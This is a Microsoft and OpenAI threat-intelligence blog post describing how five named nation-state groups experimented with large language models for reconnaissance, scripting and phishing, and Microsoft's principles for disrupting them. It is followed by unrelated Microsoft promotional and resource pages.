Over the last year, the speed, scale, and sophistication of attacks has increased alongside the rapid development and adoption of AI. Defenders are only beginning to recognize and apply the power of generative AI to shift the cybersecurity balance in their favor and keep ahead of adversaries. At the same time, it is also important for us to understand how AI can be potentially misused in the hands of threat actors. In collaboration with OpenAI, today we are publishing research on emerging threats in the age of AI, focusing on identified activity associated with known threat actors, including prompt-injections, attempted misuse of large language models (LLM), and fraud. Our analysis of the current use of LLM technology by threat actors revealed behaviors consistent with attackers using AI as another productivity tool on the offensive landscape. You can read OpenAI’s blog on the research here . Microsoft and OpenAI have not yet observed particularly novel or unique AI-enabled attack or abuse techniques resulting from threat actors’ usage of AI. However, Microsoft and our partners continue to study this landscape closely.

The objective of Microsoft’s partnership with OpenAI, including the release of this research, is to ensure the safe and responsible use of AI technologies like ChatGPT, upholding the highest standards of ethical application to protect the community from potential misuse. As part of this commitment, we have taken measures to disrupt assets and accounts associated with threat actors, improve the protection of OpenAI LLM technology and users from attack or abuse, and shape the guardrails and safety mechanisms around our models. In addition, we are also deeply committed to using generative AI to disrupt threat actors and leverage the power of new tools, including Microsoft Copilot for Security , to elevate defenders everywhere.

A principled approach to detecting and blocking threat actors

The progress of technology creates a demand for strong cybersecurity and safety measures. For example, the White House’s Executive Order on AI requires rigorous safety testing and government supervision for AI systems that have major impacts on national and economic security or public health and safety. Our actions enhancing the safeguards of our AI models and partnering with our ecosystem on the safe creation, implementation, and use of these models align with the Executive Order’s request for comprehensive AI safety and security standards.

In line with Microsoft’s leadership across AI and cybersecurity, today we are announcing principles shaping Microsoft’s policy and actions mitigating the risks associated with the use of our AI tools and APIs by nation-state advanced persistent threats (APTs), advanced persistent manipulators (APMs), and cybercriminal syndicates we track.

These principles include:   

  • Identification and action against malicious threat actors’ use: Upon detection of the use of any Microsoft AI application programming interfaces (APIs), services, or systems by an identified malicious threat actor, including nation-state APT or APM, or the cybercrime syndicates we track, Microsoft will take appropriate action to disrupt their activities, such as disabling the accounts used, terminating services, or limiting access to resources.           
  • Notification to other AI service providers: When we detect a threat actor’s use of another service provider’s AI, AI APIs, services, and/or systems, Microsoft will promptly notify the service provider and share relevant data. This enables the service provider to independently verify our findings and take action in accordance with their own policies.
  • Collaboration with other stakeholders: Microsoft will collaborate with other stakeholders to regularly exchange information about detected threat actors’ use of AI. This collaboration aims to promote collective, consistent, and effective responses to ecosystem-wide risks.
  • Transparency: As part of our ongoing efforts to advance responsible use of AI, Microsoft will inform the public and stakeholders about actions taken under these threat actor principles, including the nature and extent of threat actors’ use of AI detected within our systems and the measures taken against them, as appropriate.

Microsoft remains committed to responsible AI innovation, prioritizing the safety and integrity of our technologies with respect for human rights and ethical standards. These principles announced today build on Microsoft’s Responsible AI practices , our voluntary commitments to advance responsible AI innovation and the Azure OpenAI Code of Conduct . We are following these principles as part of our broader commitments to strengthening international law and norms and to advance the goals of the Bletchley Declaration endorsed by 29 countries.

Microsoft and OpenAI’s complementary defenses protect AI platforms

Because Microsoft and OpenAI’s partnership extends to security, the companies can take action when known and emerging threat actors surface. Microsoft Threat Intelligence tracks more than 300 unique threat actors, including 160 nation-state actors, 50 ransomware groups, and many others. These adversaries employ various digital identities and attack infrastructures. Microsoft’s experts and automated systems continually analyze and correlate these attributes, uncovering attackers’ efforts to evade detection or expand their capabilities by leveraging new technologies. Consistent with preventing threat actors’ actions across our technologies and working closely with partners, Microsoft continues to study threat actors’ use of AI and LLMs, partner with OpenAI to monitor attack activity, and apply what we learn to continually improve defenses. This blog provides an overview of observed activities collected from known threat actor infrastructure as identified by Microsoft Threat Intelligence, then shared with OpenAI to identify potential malicious use or abuse of their platform and protect our mutual customers from future threats or harm.

Recognizing the rapid growth of AI and emergent use of LLMs in cyber operations, we continue to work with MITRE to integrate these LLM-themed tactics, techniques, and procedures (TTPs) into the MITRE ATT&CK® framework or MITRE ATLAS™ (Adversarial Threat Landscape for Artificial-Intelligence Systems) knowledgebase. This strategic expansion reflects a commitment to not only track and neutralize threats, but also to pioneer the development of countermeasures in the evolving landscape of AI-powered cyber operations. A full list of the LLM-themed TTPs, which include those we identified during our investigations, is summarized in the appendix.

Summary of Microsoft and OpenAI’s findings and threat intelligence

The threat ecosystem over the last several years has revealed a consistent theme of threat actors following trends in technology in parallel with their defender counterparts. Threat actors, like defenders, are looking at AI, including LLMs, to enhance their productivity and take advantage of accessible platforms that could advance their objectives and attack techniques. Cybercrime groups, nation-state threat actors, and other adversaries are exploring and testing different AI technologies as they emerge, in an attempt to understand potential value to their operations and the security controls they may need to circumvent. On the defender side, hardening these same security controls from attacks and implementing equally sophisticated monitoring that anticipates and blocks malicious activity is vital.

While different threat actors’ motives and complexity vary, they have common tasks to perform in the course of targeting and attacks. These include reconnaissance, such as learning about potential victims’ industries, locations, and relationships; help with coding, including improving things like software scripts and malware development; and assistance with learning and using native languages. Language support is a natural feature of LLMs and is attractive for threat actors with continuous focus on social engineering and other techniques relying on false, deceptive communications tailored to their targets’ jobs, professional networks, and other relationships.

Importantly, our research with OpenAI has not identified significant attacks employing the LLMs we monitor closely. At the same time, we feel this is important research to publish to expose early-stage, incremental moves that we observe well-known threat actors attempting, and share information on how we are blocking and countering them with the defender community.

While attackers will remain interested in AI and probe technologies’ current capabilities and security controls, it’s important to keep these risks in context. As always, hygiene practices such as multifactor authentication (MFA ) and Zero Trust defenses are essential because attackers may use AI-based tools to improve their existing cyberattacks that rely on social engineering and finding unsecured devices and accounts.

The threat actors profiled below are a sample of observed activity we believe best represents the TTPs the industry will need to better track using MITRE ATT&CK® framework or MITRE ATLAS™ knowledgebase updates.

Forest Blizzard 

Forest Blizzard (STRONTIUM) is a Russian military intelligence actor linked to GRU Unit 26165, who has targeted victims of both tactical and strategic interest to the Russian government. Their activities span across a variety of sectors including defense, transportation/logistics, government, energy, non-governmental organizations (NGO), and information technology. Forest Blizzard has been extremely active in targeting organizations in and related to Russia’s war in Ukraine throughout the duration of the conflict, and Microsoft assesses that Forest Blizzard operations play a significant supporting role to Russia’s foreign policy and military objectives both in Ukraine and in the broader international community. Forest Blizzard overlaps with the threat actor tracked by other researchers as APT28 and Fancy Bear.

Forest Blizzard’s use of LLMs has involved research into various satellite and radar technologies that may pertain to conventional military operations in Ukraine, as well as generic research aimed at supporting their cyber operations. Based on these observations, we map and classify these TTPs using the following descriptions:

  • LLM-informed reconnaissance: Interacting with LLMs to understand satellite communication protocols, radar imaging technologies, and specific technical parameters. These queries suggest an attempt to acquire in-depth knowledge of satellite capabilities.
  • LLM-enhanced scripting techniques: Seeking assistance in basic scripting tasks, including file manipulation, data selection, regular expressions, and multiprocessing, to potentially automate or optimize technical operations.

Similar to Salmon Typhoon’s LLM interactions, Microsoft observed engagement from Forest Blizzard that were representative of an adversary exploring the use cases of a new technology. As with other adversaries, all accounts and assets associated with Forest Blizzard have been disabled.

Emerald Sleet

Emerald Sleet (THALLIUM) is a North Korean threat actor that has remained highly active throughout 2023. Their recent operations relied on spear-phishing emails to compromise and gather intelligence from prominent individuals with expertise on North Korea. Microsoft observed Emerald Sleet impersonating reputable academic institutions and NGOs to lure victims into replying with expert insights and commentary about foreign policies related to North Korea. Emerald Sleet overlaps with threat actors tracked by other researchers as Kimsuky and Velvet Chollima.

Emerald Sleet’s use of LLMs has been in support of this activity and involved research into think tanks and experts on North Korea, as well as the generation of content likely to be used in spear-phishing campaigns. Emerald Sleet also interacted with LLMs to understand publicly known vulnerabilities, to troubleshoot technical issues, and for assistance with using various web technologies. Based on these observations, we map and classify these TTPs using the following descriptions:

  • LLM-assisted vulnerability research: Interacting with LLMs to better understand publicly reported vulnerabilities, such as the CVE-2022-30190 Microsoft Support Diagnostic Tool (MSDT) vulnerability (known as “Follina”).
  • LLM-enhanced scripting techniques : Using LLMs for basic scripting tasks such as programmatically identifying certain user events on a system and seeking assistance with troubleshooting and understanding various web technologies.
  • LLM-supported social engineering: Using LLMs for assistance with the drafting and generation of content that would likely be for use in spear-phishing campaigns against individuals with regional expertise.
  • LLM-informed reconnaissance: Interacting with LLMs to identify think tanks, government organizations, or experts on North Korea that have a focus on defense issues or North Korea’s nuclear weapon’s program.

All accounts and assets associated with Emerald Sleet have been disabled.

Crimson Sandstorm

Crimson Sandstorm (CURIUM) is an Iranian threat actor assessed to be connected to the Islamic Revolutionary Guard Corps (IRGC). Active since at least 2017, Crimson Sandstorm has targeted multiple sectors, including defense, maritime shipping, transportation, healthcare, and technology. These operations have frequently relied on watering hole attacks and social engineering to deliver custom .NET malware. Prior research also identified custom Crimson Sandstorm malware using email-based command-and-control (C2) channels. Crimson Sandstorm overlaps with the threat actor tracked by other researchers as Tortoiseshell, Imperial Kitten, and Yellow Liderc.

The use of LLMs by Crimson Sandstorm has reflected the broader behaviors that the security community has observed from this threat actor. Interactions have involved requests for support around social engineering, assistance in troubleshooting errors, .NET development, and ways in which an attacker might evade detection when on a compromised machine. Based on these observations, we map and classify these TTPs using the following descriptions:

  • LLM-supported social engineering: Interacting with LLMs to generate various phishing emails, including one pretending to come from an international development agency and another attempting to lure prominent feminists to an attacker-built website on feminism. 
  • LLM-enhanced scripting techniques : Using LLMs to generate code snippets that appear intended to support app and web development, interactions with remote servers, web scraping, executing tasks when users sign in, and sending information from a system via email.
  • LLM-enhanced anomaly detection evasion: Attempting to use LLMs for assistance in developing code to evade detection, to learn how to disable antivirus via registry or Windows policies, and to delete files in a directory after an application has been closed.

All accounts and assets associated with Crimson Sandstorm have been disabled.

Charcoal Typhoon

Charcoal Typhoon (CHROMIUM) is a Chinese state-affiliated threat actor with a broad operational scope. They are known for targeting sectors that include government, higher education, communications infrastructure, oil & gas, and information technology. Their activities have predominantly focused on entities within Taiwan, Thailand, Mongolia, Malaysia, France, and Nepal, with observed interests extending to institutions and individuals globally who oppose China’s policies. Charcoal Typhoon overlaps with the threat actor tracked by other researchers as Aquatic Panda, ControlX, RedHotel, and BRONZE UNIVERSITY.

In recent operations, Charcoal Typhoon has been observed interacting with LLMs in ways that suggest a limited exploration of how LLMs can augment their technical operations. This has consisted of using LLMs to support tooling development, scripting, understanding various commodity cybersecurity tools, and for generating content that could be used to social engineer targets. Based on these observations, we map and classify these TTPs using the following descriptions:

  • LLM-informed reconnaissance : Engaging LLMs to research and understand specific technologies, platforms, and vulnerabilities, indicative of preliminary information-gathering stages.
  • LLM-enhanced scripting techniques : Utilizing LLMs to generate and refine scripts, potentially to streamline and automate complex cyber tasks and operations.
  • LLM-supported social engineering : Leveraging LLMs for assistance with translations and communication, likely to establish connections or manipulate targets.
  • LLM-refined operational command techniques : Utilizing LLMs for advanced commands, deeper system access, and control representative of post-compromise behavior.

All associated accounts and assets of Charcoal Typhoon have been disabled, reaffirming our commitment to safeguarding against the misuse of AI technologies.

Salmon Typhoon

Salmon Typhoon (SODIUM) is a sophisticated Chinese state-affiliated threat actor with a history of targeting US defense contractors, government agencies, and entities within the cryptographic technology sector. This threat actor has demonstrated its capabilities through the deployment of malware, such as Win32/Wkysol, to maintain remote access to compromised systems. With over a decade of operations marked by intermittent periods of dormancy and resurgence, Salmon Typhoon has recently shown renewed activity. Salmon Typhoon overlaps with the threat actor tracked by other researchers as APT4 and Maverick Panda.

Notably, Salmon Typhoon’s interactions with LLMs throughout 2023 appear exploratory and suggest that this threat actor is evaluating the effectiveness of LLMs in sourcing information on potentially sensitive topics, high profile individuals, regional geopolitics, US influence, and internal affairs. This tentative engagement with LLMs could reflect both a broadening of their intelligence-gathering toolkit and an experimental phase in assessing the capabilities of emerging technologies.

Based on these observations, we map and classify these TTPs using the following descriptions:

  • LLM-informed reconnaissance: Engaging LLMs for queries on a diverse array of subjects, such as global intelligence agencies, domestic concerns, notable individuals, cybersecurity matters, topics of strategic interest, and various threat actors. These interactions mirror the use of a search engine for public domain research.
  • LLM-enhanced scripting techniques: Using LLMs to identify and resolve coding errors. Requests for support in developing code with potential malicious intent were observed by Microsoft, and it was noted that the model adhered to established ethical guidelines, declining to provide such assistance.
  • LLM-refined operational command techniques: Demonstrating an interest in specific file types and concealment tactics within operating systems, indicative of an effort to refine operational command execution.
  • LLM-aided technical translation and explanation: Leveraging LLMs for the translation of computing terms and technical papers.

Salmon Typhoon’s engagement with LLMs aligns with patterns observed by Microsoft, reflecting traditional behaviors in a new technological arena. In response, all accounts and assets associated with Salmon Typhoon have been disabled.

In closing, AI technologies will continue to evolve and be studied by various threat actors. Microsoft will continue to track threat actors and malicious activity misusing LLMs, and work with OpenAI and other partners to share intelligence, improve protections for customers and aid the broader security community.

Appendix: LLM-themed TTPs

Using insights from our analysis above, as well as other potential misuse of AI, we’re sharing the below list of LLM-themed TTPs that we map and classify to the MITRE ATT&CK® framework or MITRE ATLAS™ knowledgebase to equip the community with a common taxonomy to collectively track malicious use of LLMs and create countermeasures against:

  • LLM-informed reconnaissance: Employing LLMs to gather actionable intelligence on technologies and potential vulnerabilities.
  • LLM-enhanced scripting techniques: Utilizing LLMs to generate or refine scripts that could be used in cyberattacks, or for basic scripting tasks such as programmatically identifying certain user events on a system and assistance with troubleshooting and understanding various web technologies.
  • LLM-aided development : Utilizing LLMs in the development lifecycle of tools and programs, including those with malicious intent, such as malware.
  • LLM-assisted vulnerability research : Using LLMs to understand and identify potential vulnerabilities in software and systems, which could be targeted for exploitation.
  • LLM-optimized payload crafting : Using LLMs to assist in creating and refining payloads for deployment in cyberattacks.
  • LLM-enhanced anomaly detection evasion : Leveraging LLMs to develop methods that help malicious activities blend in with normal behavior or traffic to evade detection systems.
  • LLM-directed security feature bypass : Using LLMs to find ways to circumvent security features, such as two-factor authentication, CAPTCHA, or other access controls.
  • LLM-advised resource development : Using LLMs in tool development, tool modifications, and strategic operational planning.

Related Posts

Photo of a security team huddling in security operations center

  • Microsoft Defender

Midnight Blizzard: Guidance for responders on nation-state attack  

The Microsoft security team detected a nation-state attack on our corporate systems on January 12, 2024, and immediately activated our response process to investigate, disrupt malicious activity, mitigate the attack, and deny the threat actor further access. The Microsoft Threat Intelligence investigation identified the threat actor as Midnight Blizzard, the Russian state-sponsored actor also known as NOBELIUM.

Coworkers discuss business while walking through a modern office

New TTPs observed in Mint Sandstorm campaign targeting high-profile individuals at universities and research orgs  

Since November 2023, Microsoft has observed a distinct subset of Mint Sandstorm (PHOSPHORUS) targeting high-profile individuals working on Middle Eastern affairs at universities and research organizations in Belgium, France, Gaza, Israel, the United Kingdom, and the United States. In this campaign, the threat actor used bespoke phishing lures in an attempt to socially engineer targets into downloading malicious files.

Photo of business woman and man in separate glass elevators.

Star Blizzard increases sophistication and evasion in ongoing attacks  

Microsoft Threat Intelligence continues to track and disrupt malicious activity attributed to a Russian state-sponsored actor we track as Star Blizzard, who has improved their detection evasion capabilities since 2022 while remaining focused on email credential theft against targets.

Microsoft Security Hub booth from RSA Conference 2022.

Discover a new era of security with Microsoft at RSAC 2023  

Microsoft Security will be at the 2023 RSA Conference and we’d love to connect with you there. In this blog post, we share all the ways you can—plus, attend the Pre-Day with Microsoft and watch the Microsoft Security Copilot demo.

microsoft research report

Microsoft Research Forum

Join us for a continuous exchange of ideas about science and technology research in the era of general AI. This series will explore recent research advances, bold new ideas, and important discussions with the global research community. Register to receive access to all episodes and be part of the conversation.

Series Episodes

Image represents Episode1

Tuesday, March 5, 2024 9:00 AM - 10:30 AM Pacific Time

Research advances are driving real-world impact faster than ever, with the latest advances in AI transforming the way we all live, work, and think. In this episode, we’ll share with you how AI is transforming health care and the natural sciences, the intersection of AI and society, and the continuing evolution of foundational AI technologies.

Featured Speakers

Photo of Chris Bishop

Chris Bishop

Technical Fellow and Director

Microsoft Research AI4Science

Photo of Bonnie Kruft

Bonnie Kruft

Partner Deputy Director

Photo of Chi Wang

Principal Researcher

Microsoft Research AI Frontiers

Photo of Kristen Severson

Kristen Severson

Senior Researcher

Microsoft Research New England

Photo of Naoto Usuyama

Naoto Usuyama

Microsoft Research Health Futures

Photo of Madeleine Daepp

Madeleine Daepp

Microsoft Research Redmond

Photo of Alessandro Sordoni

Alessandro Sordoni

Microsoft Research Montreal

Photo of Alex Lu

Rianne van den Berg

Principal Research Manager

Photo of Tristan Naumann

Tristan Naumann

Photo of Lev Tankelevitch

Lev Tankelevitch

Behavioral Science Researcher

Microsoft Research Cambridge

Photo of Vanessa Gathecha

Vanessa Gathecha

Applied Researcher and Policy Analyst

Baraza Media Lab

Photo of Tian Xie

Ashley Llorens

VP and Distinguished Scientist

Explore more about Microsoft Research

Microsoft research copilot experience

Microsoft research copilot experience

Discover more about research at Microsoft through our AI-powered experience.

Careers in research

Careers in research

Join a brilliant team of researchers and engineers working to solve technology’s most exciting challenges.

Microsoft Research Blog

Microsoft Research Blog

The latest news and insights from Microsoft Research, covering topics such as AI, data science, machine learning, human-computer interaction, and more.

Microsoft Research Podcast

Microsoft Research Podcast

An ongoing series of lively conversations about the people and ideas that inspire research at Microsoft.

Register for Microsoft Research Forum

microsoft research report

Bing research resources

For research projects outside the scope of Bing Qualified Researcher Program , researchers are welcome to access our public research resources listed below: 

Microsoft Research Resources

Microsoft Research

Microsoft Research Publications

This page provides a list of publications written by Microsoft researchers, often in collaboration with the academic community.

Microsoft Research Datasets

This page provides an index of datasets, SDKs, APIs and other open source code created by Microsoft researchers and shared with the broader academic community.

Bing Datasets

MS MARCO Dataset

MS MARCO is a collection of datasets focused on deep learning in search.

ORCAS Dataset

ORCAS is a click-based dataset associated with the  TREC Deep Learning Track .

Bing Coronavirus Query Set

The dataset includes queries from all over the world that had an intent related to the Coronavirus or Covid-19.

Bing Tools and APIs

Bing Search APIs 

APIs that enable searching via an API for Web, Images, News, Videos, Entities, Visual Search, Custom Search, Autosuggest and Spell.

Bing Webmaster Tools

A suite of tools to understand and improve the site performance.

Bing Keyword Tool is one of the Webmaster Tools that enables a detailed keyword research to check the phrases and keywords that searchers are looking for, and their corresponding search volumes.

Transparency Reports 

Microsoft Reports Hub

The Reports Hub provides a single source for key reports and resources across our environmental, social, and governance efforts. The "Transparency Reports" section provides a list of Bing's transparency reports on content removals.

EU Code of Practice on Disinformation Transparency Centre 

As a commitment under the EU Code of Practice on Disinformation, Microsoft publishes its semi-annual transparency reports in the Transparency Centre.

Facebook

Need more help?

Want more options.

Explore subscription benefits, browse training courses, learn how to secure your device, and more.

microsoft research report

Microsoft 365 subscription benefits

microsoft research report

Microsoft 365 training

microsoft research report

Microsoft security

microsoft research report

Accessibility center

Communities help you ask and answer questions, give feedback, and hear from experts with rich knowledge.

microsoft research report

Ask the Microsoft Community

microsoft research report

Microsoft Tech Community

microsoft research report

Windows Insiders

Microsoft 365 Insiders

Was this information helpful?

Thank you for your feedback.

  • Contact Sales
  • Free account

microsoft research report

Analyst reports, e-books, and white papers

Deepen your understanding of cloud computing with analyst publications, guides, and infographics for technical professionals and business leaders.

A woman giving presentation in a meeting with the help of projector while other people are sitting

Analyst reports

Explore premium analyst content from respected publishers—made available to you for free.

Emerald Research group:  Cloud Migration and Modernization: Trends for 2023

Forrester report:  Predictions 2023: Artificial Intelligence

Enterprise Strategy Group (ESG):  The Economic Value of Migrating On-Premises SQL Server Instances to Microsoft Azure SQL Solutions

A person using his phone while holding tablet in another hand while sitting on the sofa

Take a deeper dive into full-fledged resources on important cloud and Azure topics.

17 Lessons Learned Migrating SAP to the Cloud

3 Smart Ways to Exceed Your Customers’ Digital Expectations

5 Benefits of Migrating Your ASP.NET Apps to the Cloud

A Finance Resource Kit: Moving SQL Server and Windows Server to Azure

An Easier Path to the Cloud: Migrate Windows Server and SQL Server using Azure Virtual Machines

Analytics Lessons Learned: How four companies drove business agility with analytics

App Migration Toolkit: Migrate ASP.NET Web Applications to Azure

Azure Cloud Native Architecture Mapbook

Azure for Architects, Third Edition

Azure Migration Guide

Azure SQL Jumpstart Guide

Azure SQL Resource Kit

Azure SQL Revealed: A Guide to the Cloud for SQL Server Professionals

Azure Strategy and Implementation Guide, Fourth Edition

Azure Synapse Analytics Cookbook

Build a Competitive Edge with SaaS Apps

Building Together in the Cloud

Case Studies in Cloud Modernization: How five businesses used the cloud to adapt and innovate

Cloud Analytics with Microsoft Azure

Cloud Lessons Learned: Learn how four companies migrated their workloads to Azure

Cloud Migration and Modernization Checklist

Cloud Migration and Modernization with Microsoft Azure

Cloud Migration: Tips and tricks for migrating Windows and SQL Server workloads

Cloud Skills Resource Kit: Migrating Windows Server and SQL Server

Differentiate Your Apps with Intelligent Technology

Drive Innovation and Business Value Through Cloud Modernization

Enhance your apps with AI

Exploring the Possibilities of Low Code

Five Hybrid Cloud Use Cases for Azure Stack HCI

Five Steps to Modernizing Your Data

Five Steps to Simplify Your Data Mart and BI Solution

Five Ways to Amplify Power BI with Azure Synapse Analytics

Get hands-on experience with Kubernetes on Azure

Get up and running with Kubernetes

Guide to Datacenter Modernization Through Azure Stack HCI

Hands-On Linux Administration on Azure

How to Choose the Right Azure Services for Your Applications—It’s Not A or B

Invest in App Innovation to Stay Ahead of the Curve

Learn Azure in a Month of Lunches, Second Edition

Limitless Analytics with Azure Synapse

Manage your network more effectively with the Azure Networking Cookbook

Maximize Your Power BI, Tableau, and Qlik Investments

Migrate your SAP estate to the cloud—securely and reliably—with Azure

Migrating Linux to Microsoft Azure

Migrating to Azure: A Resource Guide for Your Database Migration

Modernize Your Applications with Azure Spring Apps

Modernize Your Business-Critical Systems and Applications with the Cloud

Modernize Your Java Apps

Modernize Your Web Apps: Five stories of creating better customer experiences through migration

Professional Azure SQL Managed Database Administration

Start Innovating with Microsoft Azure SQL: Explore common migration and modernization solutions

Succeeding with AI: How to Make AI Work for Your Business

Take your business to the next level with a multicloud strategy

Technical Guide to Building SaaS Apps on Azure

The Business Value of Microsoft Azure for ISVs

The Developer’s 7-Step Guide to Low-Code App Development

The Path to ISV Success: Build, Scale, and Grow Faster with ISV Success

The Road to Azure Cost Governance

The Ultimate Guide to Windows Server 2022

The Ultimate Guide to Windows Server on Azure

Understanding Cloud Migration Strategies

A group of people in office discussing while working on their laptops

White papers

Find quick reads and thought leadership on key topics such as cloud security, hybrid environments, and the economics of cloud adoption.

Digital Transformation and the Art of the Possible

Empower IT and data professionals to achieve more with all their data

Harvard Business Review Analytic Services: Drive Agility and Innovation with ERP in the Cloud

IDC: The Business Value of Migrating and Modernizing with Azure

Looking to Make Digital Transformation a Reality? Turn to trusted partners for maximum effect

Power BI Professional’s Guide to Azure Synapse Analytics

The Business Value of Microsoft Azure for SQL Server and Windows Server Workloads

The Culture of Data Leaders

Forrester study:  The Projected Total Economic Impact™ of Microsoft Azure VMware Solution

Get started with an Azure free account

Get 12 months of popular free services, a $200 credit to explore Azure services for 30 days, and more than 55 always-free services.

Contact Microsoft Azure Sales

Start a chat session, call us, or have us call you—your choice.

Cyber Signals: Navigating cyberthreats and strengthening defenses in the era of AI

February 14, 2024

  • Share on LinkedIn (opens new window)
  • Share on Facebook (opens new window)
  • Share on Twitter (opens new window)

cyber signals

Vasu Jakkal , Corporate Vice President, Security, Compliance, Identity, and Management  

The world of cybersecurity is undergoing a massive transformation. Artificial intelligence (AI) is at the forefront of this change, and has the potential to empower organizations to defeat cyberattacks at machine speed, address the cyber talent shortage and drive  innovation and efficiency in cyber security. However, adversaries can use AI as part of their exploits and it’s never been more critical for us to both secure our world using AI and secure AI for our world.  

Today we released the sixth edition Cyber Signals , spotlighting how we are protecting artificial intelligence (AI) platforms from emerging threats related to nation-state threat actors.   

In collaboration with OpenAI , we are sharing insights on state-affiliated threat actors tracked by Microsoft as Forest Blizzard, Emerald Sleet, Crimson Sandstorm, Charcoal Typhoon, and Salmon Typhoon who have sought to use large language models (LLMs) to augment their ongoing attack operations. This important research exposes incremental early moves we observe these well-known threat actors taking around AI, and notes how we blocked their activity to protect AI platforms and users.   

We are also announcing Microsoft’s principles guiding our actions mitigating the risks of nation-state advanced persistent threats, advanced persistent panipulators, and cybercriminal syndicates using AI platforms and APIs. These principles include identification and action against malicious threat actors’ use, notification to other AI service providers, collaboration with other stakeholders, and transparency.  

In addition, Microsoft is helping the wider security community to understand and detect the emerging prospects of LLMs in attack activity. We continue to work with MITRE to integrate these LLM-themed tactics, techniques, and procedures (TTPs) into the MITRE ATT&CK® framework or MITRE ATLAS™ (Adversarial Threat Landscape for Artificial-Intelligence Systems) knowledgebase. This strategic expansion reflects a commitment to not only track and neutralize threats, but also to pioneer the development of countermeasures in the evolving landscape of AI-powered cyber operations.  

This edition of Cyber Signals shares insights into how threat actors are using AI to refine their attacks and also how we use AI to protect Microsoft.  

Cybercriminals and state-sponsored actors are looking to AI, including LLMs, to enhance their productivity and take advantage of platforms that can further their objectives and attack techniques. Although threat actors’ motives and sophistication vary, they share common tasks when deploying attacks. These include reconnaissance, such as researching potential victims’ industries, locations, and relationships; coding, including improving software scripts and malware development; and assistance with learning and using both human and machine languages. O ur research with OpenAI has not identified significant attacks employing the LLMs we monitor closely.  

Microsoft uses several methods to protect itself from these types of cyberthreats, including AI-enabled threat detection to spot changes in how resources or traffic on the network are used; behavioral analytics to detect risky sign-ins and anomalous behavior; machine learning (ML) models to detect risky sign-ins and malware; Zero Trust, where every access request has to be fully authenticated, authorized, and encrypted; and device health to be verified before a device can connect to the corporate network.  

In addition, generative AI has incredible potential to help all defenders protect their organizations at machine speed. AI’s role in cybersecurity is multifaceted, driving innovation and efficiency across various domains. From enhancing threat detection to streamlining incident response, AI’s capabilities are reshaping cybersecurity. The use of LLMs in cybersecurity is a testament to AI’s potential. These models, can analyze vast amounts of data to uncover patterns and trends in cyber threats, adding valuable context to threat intelligence. They assist in technical tasks such as reverse engineering and malware analysis, providing a new layer of defense against cyberattacks. For example, users of Microsoft Copilot for Security have shown a 44% increase in accuracy across all tasks and a 26% faster completion rate. These figures highlight the tangible benefits of integrating AI into cybersecurity practices.  

As we secure the future of AI , we must acknowledge the dual nature of technology: it brings new capabilities as well as new risks. AI is not just a tool but a paradigm shift in cybersecurity. It empowers us to defend against sophisticated cyber threats and adapt to the dynamic threat landscape. By embracing AI, we can ensure a secure future for everyone.  

​ ​ To learn more about Microsoft Security solutions, visit our  website.  Bookmark the  Security blog  to keep up with our expert coverage on security matters. Also, follow us on LinkedIn ( Microsoft Security ) and X  ( @MSFTSecurity )  for the latest news and updates on cybersecurity.  

© 2024 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation.  

Related Posts

Microsoft AI University: Discussing the leading conversations around AI today 

New data and AI solutions in Microsoft Cloud for Sustainability help move organizations from pledges to progress 

3 big AI trends to watch in 2024

Increased uptake of generative AI technology brings excitement and highlights the importance of family conversations about online safety, says new research from Microsoft

Embracing AI Transformation: How customers and partners are driving pragmatic innovation to achieve business outcomes with the Microsoft Cloud

  • Check us out on RSS

Share this page:

Facebook

microsoft research report

Combating abusive AI-generated content: a comprehensive approach

Feb 13, 2024 | Brad Smith - Vice Chair & President

  • Share on Facebook (opens new window)
  • Share on LinkedIn (opens new window)
  • Share on Twitter (opens new window)

an abstract image of a window reflection

Each day, millions of people use powerful generative AI tools to supercharge their creative expression. In so many ways, AI will create exciting opportunities for all of us to bring new ideas to life. But, as these new tools come to market from Microsoft and across the tech sector, we must take new steps to ensure these new technologies are resistant to abuse.

The history of technology has long demonstrated that creativity is not confined to people with good intentions. Tools unfortunately also become weapons, and this pattern is repeating itself. We’re currently witnessing a rapid expansion in the abuse of these new AI tools by bad actors, including through deepfakes based on AI-generated video, audio, and images. This trend poses new threats for elections, financial fraud, harassment through nonconsensual pornography, and the next generation of cyber bullying.

We need to act with urgency to combat all these problems.

In an encouraging way, there is a lot we can learn from our experience as an industry in adjacent spaces – in advancing cybersecurity, promoting election security, combating violent extremist content, and protecting children. We are committed as a company to a robust and comprehensive approach that protects people and our communities, based on six focus areas:

1. A strong safety architecture . We are committed to a comprehensive technical approach grounded in safety by design. Depending on the scenario, a strong safety architecture needs to be applied at the AI platform, model, and applications levels. It includes aspects such as ongoing red team analysis, preemptive classifiers, the blocking of abusive prompts, automated testing, and rapid bans of users who abuse the system. It needs to be based on strong and broad-based data analysis. Microsoft has established a sound architecture and shared our learning via our Responsible AI and Digital Safety Standards, but it’s clear that we will need to continue to innovate in these spaces as technology evolves.

2. Durable media provenance and watermarking . This is essential to combat deepfakes in video, images, or audio. Last year at our Build 2023 conference, we announced media provenance capabilities that use cryptographic methods to mark and sign AI-generated content with metadata about its source and history. Together with other leading companies, Microsoft has been a leader in R&D on methods for authenticating provenance, including as a co-founder of Project Origin and the Coalition for Content Provenance and Authenticity (C2PA) standards body. Just last week, Google and Meta took important steps forward in supporting C2PA, steps that we appreciate and applaud.

We are already using provenance technology in the Microsoft Designer image creation tools in Bing and in Copilot, and we are in the process of extending media provenance to all our tools that create or manipulate images. We are also actively exploring watermarking and fingerprinting techniques that help to reinforce provenance techniques. We’re committed to ongoing innovation that will help users quickly determine if an image or video is AI generated or manipulated.

3. Safeguarding our services from abusive content and conduct. We’re committed to protecting freedom of expression. But this should not protect individuals that seek to fake a person’s voice to defraud a senior citizen of their money. It should not extend to deepfakes that alter the actions or statements of political candidates to deceive the public. Nor should it shield a cyber bully or distributor of nonconsensual pornography. We are committed to identifying and removing deceptive and abusive content like this when it is on our hosted consumer services such as LinkedIn, our Gaming network, and other relevant services.

4. Robust collaboration across industry and with governments and civil society . While each company has accountability for its own products and services, experience suggests that we often do our best work when we work together for a safer digital ecosystem. We are committed to working collaboratively with others in the tech sector, including in the generative AI and social media spaces. We are also committed to proactive efforts with civil society groups and in appropriate collaboration with governments.

As we move forward, we will draw on our experience combating violent extremism under the Christchurch Call, our collaboration with law enforcement through our Digital Crimes Unit, and our efforts to better protect children through the WeProtect Global Alliance and more broadly. We are committed to taking new initiatives across the tech sector and with other stakeholder groups.

